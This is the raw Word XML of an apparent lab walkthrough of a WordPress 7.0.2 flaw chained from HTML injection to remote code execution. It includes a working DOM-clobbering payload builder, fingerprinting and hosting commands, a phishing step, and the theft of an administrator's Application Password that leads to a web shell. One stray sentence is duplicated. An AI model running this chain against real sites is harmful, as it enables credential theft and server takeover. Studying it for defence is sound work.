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7663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6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2n6hi6pguonc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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v7zkrmbb7q7t" w:id="1"/>
      <w:bookmarkEnd w:id="1"/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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS2Shell: CVE-2026-64638 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</w:t>
      </w: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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/Walkthrough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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Lexend" w:cs="Lexend" w:eastAsia="Lexend" w:hAnsi="Lexend"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e23lbl2ljakb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Lexend" w:cs="Lexend" w:eastAsia="Lexend" w:hAnsi="Lexend"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Stored XSS/HTML Injection to Remote Code Execution in WordPress 7.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qv0e6bibkixy" w:id="3"/>
      <w:bookmarkEnd w:id="3"/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sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Playfair Display" w:cs="Playfair Display" w:eastAsia="Playfair Display" w:hAnsi="Playfair Display"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2026-64638 — nicknamed “XSS2Shell” is a client-side injection flaw in WordPress core 7.0.2 that can be chained all the way to unauthenticated Remote Code Execution (RCE) on the target server. The entry point is a parser-differential HTML injection in the failed-login error message on wp-login.php. On its own that is “just” an injection bug, but by abusing JavaScript that already ships on the login page it is escalated through DOM clobbering, a JSONP-based REST reflection, and a SOME (Same-Origin Method Execution) click, into theft of a freshly minted Application Password. That credential is then used to publish a malicious page and upload a plugin, ending in a web shell and full command execution as www-data.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z1oon2akt1ra" w:id="4"/>
      <w:bookmarkEnd w:id="4"/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sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact </w:t>
      </w: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525" w:tblpY="0.5391289062526994"/>
        <w:tblW w:w="8640.0" w:type="dxa"/>
        <w:jc w:val="left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rHeight w:val="313.5546875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Property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Detail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Affected software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WordPress core 7.0.2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Vulnerability class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Parser-differential HTML injection / Stored XSS (CWE-79)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Entry point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Username reflected in the wp-login.php login-error message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Escalation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DOM clobbering → JSONP REST reflection → SOME click → App Password theft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Final impact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Authenticated plugin upload → web shell → RCE as www-data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Fix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WordPress 7.0.3 (restores esc_html() around the username)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="480" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f5l8jfustxg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spacing w:after="0" w:before="480" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cxig9u7zktuh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Title"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5y1mi7hlqqkb" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How was the XSS Flaw Discovered?(Root Cause)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0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The researchers who found XSS2Shell identified the flaw through code analysis and testing of how WordPress handles failed-login input. The core issue is a parser disagreement between two sanitization routines that process the same username.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Playfair Display" w:cs="Playfair Display" w:eastAsia="Playfair Display" w:hAnsi="Playfair Display"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9c4g1mc84bpz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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lwlycf4vfkw1" w:id="9"/>
      <w:bookmarkEnd w:id="9"/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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spotting the Parser Disagreement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00" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A username submitted during a failed login in wp-login.php passes through two separate sanitization routines — wp_strip_all_tags() (which relies on PHP’s strip_tags()) and wp_kses_post().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mon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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4ao23exmjfky" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifying the Blind Spot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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a tag-like construct has whitespace immediately after the opening angle bracket (e.g. “&lt; tag&gt;”), strip_tags() does not recognize it as markup and leaves it as plain text.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Playfair Display" w:cs="Playfair Display" w:eastAsia="Playfair Display" w:hAnsi="Playfair Display"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3015s95i2773" w:id="11"/>
      <w:bookmarkEnd w:id="11"/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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Observing different validation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00" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When that exact same input is then handed to wp_kses_post(), its independent tokenizer interprets the construct as valid HTML (e.g. “&lt;tag&gt;”) — so the markup survives the first filter and is accepted by the second.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mon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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pwo97amcwjro" w:id="12"/>
      <w:bookmarkEnd w:id="12"/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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing browser reflection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00" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mono Medium"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This mismatch let attacker-controlled HTML elements render live inside the error message on the login page. From there the injected markup was chained into the JavaScript already loaded on the login page — producing DOM clobbering, REST API reflection via JSONP, and ultimately the execution path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono Medium" w:cs="Roboto Mono Medium" w:eastAsia="Roboto Mono Medium" w:hAnsi="Roboto Mon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00" w:line="276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In short: strip_tags() says “not a tag,” wp_kses_post() says “valid tag.” The attacker lives in the gap between the two parsers.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Title"/>
        <w:spacing w:after="0" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d7ao37bhxwsm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Title"/>
        <w:spacing w:after="0" w:before="480" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vqz1e9mki7ra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Title"/>
        <w:spacing w:after="0" w:before="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qho9b6aq2tyf" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Attack Chain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The end-to-end exploitation path is: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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fingerprint the target — confirm WordPress 7.0.2.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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the administrator and their likely email address.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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Build the parser-differential payload (index.html + helper files).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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the payload on an attacker-controlled web server.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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deliver the malicious link to the admin via social engineering.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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin clicks → DOM clobbering + SOME chain steals a new Application Password.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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the stolen App Password to publish a page and upload a malicious plugin.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360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reach the uploaded web shell → RCE → read the flag.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Title"/>
        <w:spacing w:after="0" w:before="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e3nj8jxkg2ec" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dec0kx4vfhwx" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Fingerprint the Target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An exploit tied to a specific core version first needs the version confirmed. WordPress leaks its version in a few predictable places — most reliably the generator meta tag on the homepage (readme.html in the web root is another common leak if the theme strips the generator tag).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:left w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:bottom w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:right w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="276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curl -s http://postcraft.thm:8080/ | grep -i generator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76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response contains &lt;meta name="generator" content="WordPress 7.0.2" /&gt;, confirming the target runs the exact vulnerable version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A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114300" distR="114300">
            <wp:extent cx="5669280" cy="271232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12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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1 — The generator meta tag confirms WordPress 7.0.2, the vulnerable version.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6ynu7po3ham" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Find the Administrator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The exploit needs a target to send the link to. WordPress exposes author information by default — on author archive pages and through the REST API at /wp-json/wp/v2/users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:left w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:bottom w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:right w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="276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http://postcraft.thm:8080/wp-json/wp/v2/users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PostCraft has exactly one published author: admin (slug “admin”). Combined with the site domain, that gives a realistic guess at the owner’s address: admin@postcraft.thm. No password guessing is needed — just somewhere to send the malicious link.The response contains &lt;meta name="generator" content="WordPress 7.0.2" /&gt;, confirming the target runs the exact vulnerable version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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114300" distR="114300">
            <wp:extent cx="5669280" cy="2552771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527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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 — The REST users endpoint reveals the single admin account and slug, pointing to admin@postcraft.thm.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tgywbbvpxbzs" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Build the Payload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The exploit is a small set of files, each with a distinct role. The centerpiece is index.html, which builds the parser-differential payload and drives the victim’s browser to destruction:) (eventual full RCE).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="864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File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index.html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Malicious page that runs on load. It builds the parser-differential payload, opens the payload-carrying child window, then navigates the victim to the WordPress Application Password authorization screen.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relay.html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 same-origin timing buffer. It waits briefly before submitting the actual payload to /wp-login.php, giving the authorization screen time to fully render before the SOME chain clicks the approve button in the admin’s original logged-in tab.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callback.php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Receives the stolen Application Password server-side, publishes a malicious page via the REST API using it, and redirects the admin’s browser there.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get-payload.php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Serves the malicious plugin ZIP.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payload.zip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 minimal valid plugin header plus shell.php, the RCE confirmation endpoint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:line="276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The key part of index.html is buildLogPayload(). Note the whitespace after each “&lt;” — that is exactly what slips past strip_tags() while wp_kses_post() still treats it as markup. The injected elements (ajaxurl, color-picker, the generate-password button) are chosen to clobber DOM references that the login page’s own JavaScript will act on, and the _jsonp value reflects window.opener.approve.click back into the page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:left w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:bottom w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:right w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="276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function buildLogPayload() {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  const restRoute =</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    '/?rest_route=/&amp;_method=GET&amp;_envelope=1&amp;_jsonp=' +</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    encodeURIComponent('window.opener.approve.click');</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  return (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    '&lt; area id=ajaxurl href=' + restRoute + '&gt;' +</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    '&lt; div id=color-picker class=reset-pass-submit&gt;' +</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    '&lt; button class="wp-generate-pw color-option"&gt;X'</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  );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114300" distR="114300">
            <wp:extent cx="5669280" cy="2659137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591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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3 — index.html: constants (TARGET, CALLBACK_URL, APP_ID) and the parser-differential payload builder.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114300" distR="114300">
            <wp:extent cx="5669280" cy="291269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126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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4 — index.html: the run() routine submits the payload, then redirects the victim to authorize-application.php.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p19mrxdtuz0g" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Host the Payload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All attacker files live in one directory served over HTTP. A simple PHP development server on port 9000 is enough to host index.html, relay.html, callback.php, get-payload.php and payload.zip.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:left w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:bottom w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
          <w:right w:color="cccccc" w:space="6" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="276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cd ~/xss2shell/attacker &amp;&amp; php -S 0.0.0.0:9000 &amp;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114300" distR="114300">
            <wp:extent cx="5669280" cy="2850595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505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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 — The attacker’s PHP server hosting all payload files on 0.0.0.0:9000.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qjdwu1md95ir" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 — Deliver the Malicious Link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The chain is client-side and requires the logged-in admin to open the link, so delivery is a social-engineering email. A believable “broken link on the homepage” pretext entices the admin (admin@postcraft.thm) to click the attacker URL (http://10.64.149.80:9000/index.html).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E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114300" distR="114300">
            <wp:extent cx="5669280" cy="2746057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460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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6 — The phishing email: target address, social-engineering pretext, and the malicious link.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spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ti9fk11stju2" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 — From Click to Credential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Within moments of the admin opening the link, the chain fires exactly as designed: the injected, DOM-clobbered elements auto-click, the SOME chain reaches into the admin’s own authorization tab, and WordPress mints a brand-new Application Password — which is reflected straight back to the attacker’s callback.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072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114300" distR="114300">
            <wp:extent cx="5669280" cy="2651817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518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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 — Attacker server log: index.html and relay.html load, then a 302 to callback.php carrying user_login=admin and the new password.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callback.php records the captured credential to disk. The username is admin and the value is a standard space-grouped Application Password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075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114300" distR="114300">
            <wp:extent cx="5669280" cy="2662682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626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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8 — captured_credentials.txt: the stolen Application Password for admin, captured server-side.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 design detail worth calling out: WordPress’s REST API does not send Access-Control-Allow-Origin for cross-origin requests, so a browser-side fetch() from the attacker’s page would be blocked from reading the response even with valid Basic auth. callback.php sidesteps this entirely by publishing the malicious page with a server-side curl call — a plain HTTP request with no browser and no CORS involved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078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114300" distR="114300">
            <wp:extent cx="5669280" cy="26485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4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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
